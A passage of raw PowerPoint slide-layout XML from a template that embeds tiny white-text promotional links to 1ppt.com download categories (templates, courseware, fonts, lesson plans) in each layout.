              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout250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50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50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50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5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51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51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51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51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51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51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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout251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51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51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51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5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52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52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52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52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52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52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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout252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52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52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52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5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53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53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53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53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53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53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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
